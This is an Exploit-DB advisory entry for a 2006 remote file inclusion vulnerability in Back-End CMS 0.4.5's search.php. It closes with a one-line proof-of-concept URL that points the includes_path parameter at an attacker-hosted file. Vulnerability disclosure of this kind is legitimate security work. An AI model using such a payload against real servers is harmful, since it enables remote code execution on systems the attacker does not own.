Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion

2006-09-25T00:00:00
ID EDB-ID:28676
Type exploitdb
Reporter Root3r_H3ll
Modified 2006-09-25T00:00:00

Description

Back-End CMS 0.4.5 search.php includes_path Parameter Remote File Inclusion. CVE-2006-5076 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20207/info
  
Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
  
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
  
Back-End CMS version 0.4.5 is vulnerable to these issues.

http://www.example.com/[Path]/search.php?includes_path=attacker's_file